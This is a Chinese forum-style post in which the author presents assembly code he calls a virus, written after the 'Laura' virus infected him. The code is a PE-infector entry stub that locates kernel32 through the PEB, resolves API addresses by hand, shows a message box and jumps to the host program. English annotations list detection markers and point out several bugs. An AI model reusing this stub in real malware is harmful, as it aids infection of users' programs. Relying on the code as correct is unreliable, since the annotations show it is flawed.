前年写的病毒,当时中了劳拉病毒,然后我照的它写了一个,参考了好多资料,主要是386汇编和PE文件结构的资料,个人感觉汇编什么的不是很难,当时我还不太熟悉宏汇编,不然可以有更简洁的代码
.486
.model flat, stdcall
option casemap :none
include /MASM32/INCLUDE/windows.inc
.code
;-----------------------------------------------------------------------
; Host-prepended stub (analysis annotations).
; Syntax: MASM, 32-bit flat model, stdcall.
; Flow:   locate the kernel32 image base through the PEB loader list,
;         walk its export directory for the name "GetProcAddress",
;         resolve LoadLibraryA and MessageBoxA, show a message box,
;         then jump to the hard-coded original entry point of the host.
; Frame (after "sub esp,80h" below):
;   [ebp-4]   = relocation delta (runtime address - link address)
;   [ebp-0Ch] = resolved GetProcAddress
;   [ebp-10h] = kernel32 image base
;   [ebp-14h] = resolved LoadLibraryA
; Observable markers for detection: a read of the 30h PEB slot, a
; name-table walk comparing against "GetProcAddress" assembled on the
; stack from four dword immediates, the plain-text strings
; "LoadLibraryA" / "user32.dll" / "MessageBoxA", and a final jmp to the
; absolute address 0041c560h.
;-----------------------------------------------------------------------
start:
call pstart                          ; pushes the address of pstart
pstart:
pop ebx ;mov ebx,dword ptr [esp]     ; ebx = runtime address of pstart
sub ebx,offset pstart ;// ebx = relocation delta; should be 0 here (unrelocated run)
push ebp ;// save the EBP the program started with
mov ebp,esp
sub esp,80h ;// reserve locals; adjust (was 40h) to the number of variables
mov dword ptr [ebp-4],ebx ;// save to Pbase (the delta)
;///getKernelBase///
mov eax, ss:[30h]                    ; NOTE(review): written with an ss: override; the NT PEB is reached via fs:[30h]
test eax,eax
js loc1                              ; sign-bit path: presumably the Win9x layout - not verifiable here
mov eax, dword ptr [eax + 0Ch]       ; eax = PEB.Ldr
mov esi, dword ptr [eax + 1Ch]       ; esi = InInitializationOrderModuleList.Flink (first entry)
lodsd                                ; eax = Flink of that entry -> second entry
mov eax, dword ptr [eax+8]           ; eax = DllBase of the second entry; assumes it is kernel32 (true on older Windows only - TODO confirm)
jmp loc2
loc1:
mov eax,dword ptr [eax+34h]          ; alternate (presumably 9x) layout; offsets not verifiable from this file
mov eax,dword ptr [eax+0B8h]
loc2:
mov dword ptr [ebp-10h],eax          ; [ebp-10h] = kernel32 base
push ebp ;// save the variable-table pointer EBP
mov ebp,eax ;// ebp=Kbase
;///Get GetProcAddress's EntryPoint//
mov eax,dword ptr [ebp+3Ch]          ; eax = e_lfanew (offset of the PE header)
mov edx,dword ptr [ebp+eax+120]      ; edx = export directory RVA (DataDirectory[0] at PE header + 78h)
add edx,ebp                          ; edx = export directory VA
mov ecx,dword ptr [edx+24] ;// number of names (NumberOfNames)
mov ebx,dword ptr [edx+28] ;// at=esp+4  (AddressOfFunctions RVA; advanced 4 per name below)
push dword ptr [edx+32] ;//npt=esp   (AddressOfNames RVA, kept on the stack as the walk cursor)
;
; Build "GetProcAddress",0,0 at esp-10h from four little-endian dword immediates.
; Note the ordinal table (directory +36) is never consulted: the name index
; is used directly as the function-table index.
mov edi,esp
sub edi,10h
mov dword ptr [edi],50746547h        ; "GetP"
mov dword ptr [edi+4],41636f72h ; to be changed   ("rocA")
mov dword ptr [edi+8],65726464h      ; "ddre"
mov dword ptr [edi+0Ch],00007373h    ; "ss",0,0
;
; Name walk. Invariants: [esp] = RVA of the current name-pointer entry,
; ebx = RVA of the matching function-table entry, ecx = names remaining,
; edx = index into the pattern for the current name.
findstart:
dec ecx
xor edx,edx
mov esi,dword ptr [esp]
add esi,ebp                          ; esi = VA of the current name-pointer entry
mov esi,dword ptr [esi]
add esi,ebp                          ; esi = VA of the exported name string
cmpbyte:
lodsb
cmp al,byte ptr [edi+edx]
jne notsame
cmp edx,14                           ; 14 = index of the terminating 0 in the pattern: full match
je find
inc edx
loop cmpbyte                         ; dec ecx / jnz: ecx is also the remaining-name counter, so each byte compared consumes one count
jmp cantfind
notsame:
add dword ptr [esp],4                ; next name-pointer entry
add ebx,4                            ; next function-table entry
jmp findstart
cantfind:
xor eax,eax                          ; result 0; nothing downstream checks for it before the call
jmp findend
find:
add ebx,ebp                          ; ebx = VA of the function-table entry
mov eax,dword ptr[ebx]
add eax,ebp                          ; eax = VA of GetProcAddress
findend:
add esp,4                            ; drop the name-pointer cursor
pop ebp ;// pop the variable-table pointer
mov dword ptr [ebp-0Ch],eax ;// save GetProcAddress's entry point
;/
mov ebx,dword ptr [ebp-4]            ; ebx = relocation delta
mov edx,offset LoadLibrary ;//LoadLibrary
add edx,ebx                          ; edx = runtime address of "LoadLibraryA"
push edx
push dword ptr [ebp-10h]
call dword ptr [ebp-0Ch] ;// get LoadLibraryA's address: GetProcAddress(kernel32, "LoadLibraryA")
mov dword ptr [ebp-14h],eax
mov edx,offset USER32 ;//user32.dll
add edx,ebx
push edx
call eax ;// call LoadLibrary: eax = LoadLibraryA("user32.dll")
mov edx,offset messagebox ;// "MessageBoxA"
add edx,ebx
push edx
push eax
call dword ptr [ebp-0Ch] ;// get MessageBoxA's address: GetProcAddress(hUser32, "MessageBoxA")
; MessageBoxA(hWnd=0, lpText=edx, lpCaption=edx, uType=0).
; edx is a volatile register under stdcall, so its value after the call above
; is whatever the callee left in it, not guaranteed to be the string pointer.
push 0
push edx
push edx
push 0
call eax
nop
nop
;//
add esp,80h ;// release locals; adjust (was 40h) to the number of variables
pop ebp                              ; restore the original EBP
jmp pend                             ; skip over the inline strings
;
LoadLibrary:
db "LoadLibraryA",0
USER32:
db "user32.dll",0
messagebox:
db "MessageBoxA",0
pend:
mov eax,0041c560h ;// jump to the host's normal entry point (absolute, hard-coded for this host)
jmp eax
nop
nop
nop
nop
nop
nop
nop
end start